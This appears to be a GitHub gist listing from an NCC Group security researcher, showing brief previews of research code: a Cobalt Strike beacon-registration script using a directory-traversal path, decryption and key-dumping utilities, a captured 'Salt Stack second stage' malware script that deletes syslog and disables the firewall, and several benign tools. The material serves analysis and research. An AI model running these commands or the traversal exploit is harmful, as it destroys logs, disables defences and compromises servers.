Ollie olliencc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # First we need to register a beacon with a directory traversal in the ip address field | |
| ip_address = "../../../../../../%s" % os.path.split(args.filepath)[0] | |
| # Generate symmetric keys (used later) | |
| raw_aes_keys = os.urandom(16) | |
| aes_key, hmac_key = generate_keys(raw_aes_keys) | |
| m = Metadata(public_key=args.public_key, cs_version=3) | |
| m.public_key = args.public_key | |
| m.bid = args.bid |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # NOTE: insert decryption functions | |
| if __name__ == "__main__": | |
| SHARED_KEY = binascii.unhexlify("bca4caea1b3172aa979a5eac6c813184") | |
| HMAC_KEY = binascii.unhexlify("94b64efcf87b13c6828bcf14373bb2f9") | |
| with open(sys.argv[1], 'rb') as f: | |
| enc_data = f.read() | |
| encrypted_data, data_length = readInt(enc_data) | |
| print "Encrypted data should be: %d" % data_length | |
| signature = encrypted_data[-16:] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| import hmac | |
| import binascii | |
| import base64 | |
| import sys | |
| import struct | |
| from Crypto.Cipher import AES | |
| HASH_ALGO = hashlib.sha256 | |
| SIG_SIZE = HASH_ALGO().digest_size |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import M2Crypto | |
| import requests | |
| PRIVATE_KEY_TEMPLATE = "-----BEGIN PRIVATE KEY-----\n{}\n-----END PRIVATE KEY-----" | |
| PUBLIC_KEY_TEMPLATE = "-----BEGIN PUBLIC KEY-----\n{}\n-----END PUBLIC KEY-----" | |
| class Metadata(object): | |
| """ | |
| Class to represent a beacon Metadata object | |
| """ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import java.io.File; | |
| import java.util.Base64; | |
| import common.CommonUtils; | |
| import java.security.KeyPair; | |
| class DumpKeys | |
| { | |
| public static void main(String[] args) | |
| { | |
| try { |
olliencc
/ Salt Stack Second Stage from 217.12.210.192
Created
May 3, 2020 09:56
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /bin/sh | |
| ulimit -n 65535 | |
| rm -rf /var/log/syslog | |
| chattr -iua /tmp/ | |
| chattr -iua /var/tmp/ | |
| ufw disable | |
| iptables -F | |
| echo "nope" >/tmp/log_rot | |
| sudo sysctl kernel.nmi_watchdog=0 | |
| echo '0' >/proc/sys/kernel/nmi_watchdog |
olliencc
/ sendtoTeams.cs
Created
May 1, 2020 19:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net.Http; | |
| using System.Runtime.CompilerServices; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| using Newtonsoft.Json; | |
| using MessageCardModel; | |
| using System.Collections.Generic; | |
| using System.IO; | |
| using MessageCardModel.Actions; |
olliencc
/ PEDumpHelpScanner.py
Created
April 12, 2019 20:21
How to scan for Windows binaries with the MINIDUMP_AUXILIARY_PROVIDER resource section
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Ollie Whitehouse | |
| # ollie.whitehouse [@] nccgroup.com | |
| # | |
| import os | |
| import pefile | |
| rootdirs = [ | |
| #"C:/Data/NCC/!Research/DUMPHELPER/test/t/" |
olliencc
/ whodoineedtotrust.go
Created
January 2, 2016 21:16
Understand which CAs you need to trust for the Alexa top million
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Understand which CAs you need to trust for the Alexa top million | |
| Released as open source by NCC Group Plc - http://www.nccgroup.trust/ | |
| Developed by Ollie Whitehouse, ollie dot whitehouse at nccgroup dot trust | |
| Released under AGPL |
olliencc
/ nccsslkeyandcertlog.c
Last active
August 29, 2015 14:22
dump the certificate and private in PEM format when used
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // based on https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/ | |
| // Licensed under the terms of GPLv3 (or any later version) at your choice | |
| // | |
| // works for daemons which can be run in the foreground | |
| // | |
| // gcc nccsslkeyandcertlog.c -shared -o nccsslkeyandcertlog.so -fPIC -ldl | |
| // | |
| // | |